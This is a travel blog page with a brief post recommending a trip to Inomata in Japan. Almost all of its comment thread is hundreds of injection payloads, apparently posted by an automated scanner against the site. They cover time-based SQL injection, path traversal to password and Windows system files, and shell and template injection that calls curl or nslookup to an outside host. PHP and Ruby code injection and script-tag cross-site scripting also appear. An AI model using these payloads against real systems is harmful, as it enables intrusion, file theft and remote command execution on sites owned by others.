Hello all, just been in Japan for 3 weeks for work. Snuck in a visit to Inomata, every piece was amazing. Highly recommend the short trip out there. Easy to book on everyone’s favourite booking website as well.
Copyright © 2015 TokyoTableTrip All Rights Reserved.
10 Comments
>everyone’s favourite booking website
hahaha!
re: Leo Saito
OHHabL6z
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+627-627-1=0+0+0+1
re: Leo Saito
-1 OR 3+627-627-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
ImUa4OYm'; waitfor delay '0:0:15' --
re: Leo Saito
9LBgOG1H
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+429-429-1=0+0+0+1
re: Leo Saito
-1 OR 3+429-429-1=0+0+0+1
re: Leo Saito
-5 OR 615=(SELECT 615 FROM PG_SLEEP(15))--
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
-5) OR 366=(SELECT 366 FROM PG_SLEEP(15))--
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
-1)) OR 57=(SELECT 57 FROM PG_SLEEP(15))--
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
7H9XqJLA' OR 857=(SELECT 857 FROM PG_SLEEP(15))--
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
O6JwYfxY') OR 323=(SELECT 323 FROM PG_SLEEP(15))--
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
dHgSGBWk')) OR 10=(SELECT 10 FROM PG_SLEEP(15))--
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
8aboxsIN'; waitfor delay '0:0:15' --
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
-5 OR 165=(SELECT 165 FROM PG_SLEEP(15))--
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@Ik8vT
re: Leo Saito
-5) OR 413=(SELECT 413 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 680=(SELECT 680 FROM PG_SLEEP(15))--
re: Leo Saito
DfYTaXmD' OR 295=(SELECT 295 FROM PG_SLEEP(15))--
re: Leo Saito
NpfQETKc') OR 143=(SELECT 143 FROM PG_SLEEP(15))--
re: Leo Saito
5OEl7Csb')) OR 810=(SELECT 810 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@asGwt
re: Leo Saito
1ryVSXGSO
re: Leo Saito
response.write(9344937*9849577)
re: Leo Saito
'+response.write(9344937*9849577)+'
re: Leo Saito
"+response.write(9344937*9849577)+"
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
%0abcc:074625.67-14595.67.708b2.19990.2@bxss.me
re: Leo Saito
file:///etc/passwd
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-14596.67.708b2.19990.2@bxss.me
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
/etc/passwd
re: Leo Saito
echo cinisc$()\ xhddce\nz^xyu||a #' &echo cinisc$()\ xhddce\nz^xyu||a #|" &echo cinisc$()\ xhddce\nz^xyu||a #
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
&echo ccbhlv$()\ xibjsz\nz^xyu||a #' &echo ccbhlv$()\ xibjsz\nz^xyu||a #|" &echo ccbhlv$()\ xibjsz\nz^xyu||a #
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
|echo mrmasn$()\ eedklu\nz^xyu||a #' |echo mrmasn$()\ eedklu\nz^xyu||a #|" |echo mrmasn$()\ eedklu\nz^xyu||a #
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
(nslookup hitsshwahdhcb750bb.bxss.me||perl -e "gethostbyname('hitsshwahdhcb750bb.bxss.me')")
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
$(nslookup hitiebffaruoj1f603.bxss.me||perl -e "gethostbyname('hitiebffaruoj1f603.bxss.me')")
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
&nslookup hitoevtqtvptkd2870.bxss.me&'\"`0&nslookup hitoevtqtvptkd2870.bxss.me&`'
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
&(nslookup hitvfzebkqrjd5c2fd.bxss.me||perl -e "gethostbyname('hitvfzebkqrjd5c2fd.bxss.me')")&'\"`0&(nslookup hitvfzebkqrjd5c2fd.bxss.me||perl -e "gethostbyname('hitvfzebkqrjd5c2fd.bxss.me')")&`'
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
|(nslookup hitiwoypxoqoe8aa4f.bxss.me||perl -e "gethostbyname('hitiwoypxoqoe8aa4f.bxss.me')")
re: Leo Saito
file:///etc/passwd
re: Leo Saito
${9999471+10000183}
re: Leo Saito
`(nslookup hitxyoqusgnrr45bc6.bxss.me||perl -e "gethostbyname('hitxyoqusgnrr45bc6.bxss.me')")`
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
;(nslookup hithvggqtbvzncdeae.bxss.me||perl -e "gethostbyname('hithvggqtbvzncdeae.bxss.me')")|(nslookup hithvggqtbvzncdeae.bxss.me||perl -e "gethostbyname('hithvggqtbvzncdeae.bxss.me')")&(nslookup hithvggqtbvzncdeae.bxss.me||perl -e "gethostbyname('hithvggqtbvzncdeae.bxss.me')")
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
)
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Leo Saito
WEB-INF/web.xml
re: Leo Saito
WEB-INF\web.xml
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
'.gethostbyname(lc('hitid'.'qdodtgim803a3.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(98).chr(71).chr(112).chr(87).'
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
".gethostbyname(lc("hitxa"."iqqftpqtd83cc.bxss.me."))."A".chr(67).chr(hex("58")).chr(103).chr(86).chr(102).chr(79)."
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
/etc/shells
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
bxss.me
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(121).concat(78).concat(107).concat(67)+(require"socket"
Socket.gethostbyname("hitmk"+"fukciwly79366.bxss.me.")[3].to_s)+"
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(101).concat(65).concat(117).concat(87)+(require'socket'
Socket.gethostbyname('hitem'+'rxpmered5abb0.bxss.me.')[3].to_s)+'
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
'"
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
<!--
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
1
re: Leo Saito
1
re: Leo Saito
-1 OR 2+410-410-1=0+0+0+1 --
re: Leo Saito
-1 OR 3+410-410-1=0+0+0+1 --
re: Leo Saito
-1 OR 2+574-574-1=0+0+0+1
re: Leo Saito
-1 OR 3+574-574-1=0+0+0+1
re: Leo Saito
-1' OR 2+881-881-1=0+0+0+1 --
re: Leo Saito
-1' OR 3+881-881-1=0+0+0+1 --
re: Leo Saito
-1' OR 2+708-708-1=0+0+0+1 or '0CAOAk5F'='
re: Leo Saito
-1' OR 3+708-708-1=0+0+0+1 or '0CAOAk5F'='
re: Leo Saito
-1" OR 2+109-109-1=0+0+0+1 --
re: Leo Saito
-1" OR 3+109-109-1=0+0+0+1 --
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
munmahEF'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 946=(SELECT 946 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 716=(SELECT 716 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 510=(SELECT 510 FROM PG_SLEEP(15))--
re: Leo Saito
5UAY3yZj' OR 466=(SELECT 466 FROM PG_SLEEP(15))--
re: Leo Saito
zti1VO91') OR 706=(SELECT 706 FROM PG_SLEEP(15))--
re: Leo Saito
6rXcwXNU')) OR 437=(SELECT 437 FROM PG_SLEEP(15))--
re: Leo Saito
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@dbqW0
re: Leo Saito
12ZVMBEY60
re: Leo Saito
response.write(9703327*9763006)
re: Leo Saito
'+response.write(9703327*9763006)+'
re: Leo Saito
"+response.write(9703327*9763006)+"
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
file:///etc/passwd
re: Leo Saito
${9999953+9999002}
re: Leo Saito
../
re: Leo Saito
)
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
redirtest.acx
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Leo Saito
echo hnumkr$()\ excffh\nz^xyu||a #' &echo hnumkr$()\ excffh\nz^xyu||a #|" &echo hnumkr$()\ excffh\nz^xyu||a #
re: Leo Saito
'.gethostbyname(lc('hitnh'.'ekuikzqf50f13.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(67).chr(101).chr(80).'
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Leo Saito
&echo xvufcy$()\ cbraag\nz^xyu||a #' &echo xvufcy$()\ cbraag\nz^xyu||a #|" &echo xvufcy$()\ cbraag\nz^xyu||a #
re: Leo Saito
".gethostbyname(lc("hittj"."mdntdhlv74e25.bxss.me."))."A".chr(67).chr(hex("58")).chr(120).chr(70).chr(113).chr(90)."
re: Leo Saito
/etc/shells
re: Leo Saito
|echo cljjpz$()\ pyexzb\nz^xyu||a #' |echo cljjpz$()\ pyexzb\nz^xyu||a #|" |echo cljjpz$()\ pyexzb\nz^xyu||a #
re: Leo Saito
gethostbyname(lc('hitsn'.'qckgvfnm2c0f9.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(82).chr(115).chr(86)
re: Leo Saito
../../../../../../../../../../../../../../etc/shells
re: Leo Saito
expr 9000887219 - 961895
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
(nslookup -q=cname hitngxmxscsok94f25.bxss.me||curl hitngxmxscsok94f25.bxss.me))
re: Leo Saito
bxss.me
re: Leo Saito
$(nslookup -q=cname hitzrrutoqtwnbf5f2.bxss.me||curl hitzrrutoqtwnbf5f2.bxss.me)
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
&nslookup -q=cname hitwkxglochpq919b6.bxss.me&'\"`0&nslookup -q=cname hitwkxglochpq919b6.bxss.me&`'
re: Leo Saito
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Leo Saito
http://bxss.me/t/fit.txt?.jpg
re: Leo Saito
&(nslookup -q=cname hitiydutjccuaba220.bxss.me||curl hitiydutjccuaba220.bxss.me)&'\"`0&(nslookup -q=cname hitiydutjccuaba220.bxss.me||curl hitiydutjccuaba220.bxss.me)&`'
re: Leo Saito
|(nslookup -q=cname hitsyxitxqkatdbb8d.bxss.me||curl hitsyxitxqkatdbb8d.bxss.me)
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
`(nslookup -q=cname hitxblnwmdjcl7134b.bxss.me||curl hitxblnwmdjcl7134b.bxss.me)`
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
;(nslookup -q=cname hitafabgfrjul93129.bxss.me||curl hitafabgfrjul93129.bxss.me)|(nslookup -q=cname hitafabgfrjul93129.bxss.me||curl hitafabgfrjul93129.bxss.me)&(nslookup -q=cname hitafabgfrjul93129.bxss.me||curl hitafabgfrjul93129.bxss.me)
re: Leo Saito
'"()
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
|(nslookup${IFS}-q${IFS}cname${IFS}hitqtmtkequgb63c6b.bxss.me||curl${IFS}hitqtmtkequgb63c6b.bxss.me)
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
'&&sleep(27*1000)*nicwpu&&'
re: Leo Saito
&(nslookup${IFS}-q${IFS}cname${IFS}hitofavyzgqmqfd4f6.bxss.me||curl${IFS}hitofavyzgqmqfd4f6.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitofavyzgqmqfd4f6.bxss.me||curl${IFS}hitofavyzgqmqfd4f6.bxss.me)&`'
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
"&&sleep(27*1000)*qoihre&&"
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
'||sleep(27*1000)*gtkrhw||'
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
"||sleep(27*1000)*mlbdkp||"
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(109).concat(83).concat(122).concat(75)+(require"socket"
Socket.gethostbyname("hitzx"+"qcxicozneb72b.bxss.me.")[3].to_s)+"
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(104).concat(77).concat(119).concat(70)+(require'socket'
Socket.gethostbyname('hithh'+'nwkkazgu6ce5b.bxss.me.')[3].to_s)+'
re: Leo Saito
'A'.concat(70-3).concat(22*4).concat(121).concat(72).concat(111).concat(80)+(require'socket'
Socket.gethostbyname('hityh'+'siqhwpls512a2.bxss.me.')[3].to_s)
re: Leo Saito
replies
re: Leo Saito
'"
re: Leo Saito
replies�
re: Leo Saito
<!--
re: Leo Saito
replies/.
re: Leo Saito
'"()&%<zzz><ScRiPt >k31J(9534)</ScRiPt>
re: Leo Saito
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hithtqirpwufaae9c5.bxss.me")}}
re: Leo Saito
'"()&%<zzz><ScRiPt >k31J(9098)</ScRiPt>
re: Leo Saito
9173286
re: Leo Saito
d1mWdbKv
re: Leo Saito
*1
re: Leo Saito
*1
re: Leo Saito
*1
re: Leo Saito
*1
re: Leo Saito
-1 OR 5*5=25 --
re: Leo Saito
-1 OR 5*5=26 --
re: Leo Saito
-1 OR 5*5=25
re: Leo Saito
-1 OR 5*5=26
re: Leo Saito
*if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
-1 waitfor delay '0:0:15' --
re: Leo Saito
gLe9MGdc'; waitfor delay '0:0:15' --
re: Leo Saito
-1 OR 526=(SELECT 526 FROM PG_SLEEP(15))--
re: Leo Saito
-1) OR 983=(SELECT 983 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 606=(SELECT 606 FROM PG_SLEEP(15))--
re: Leo Saito
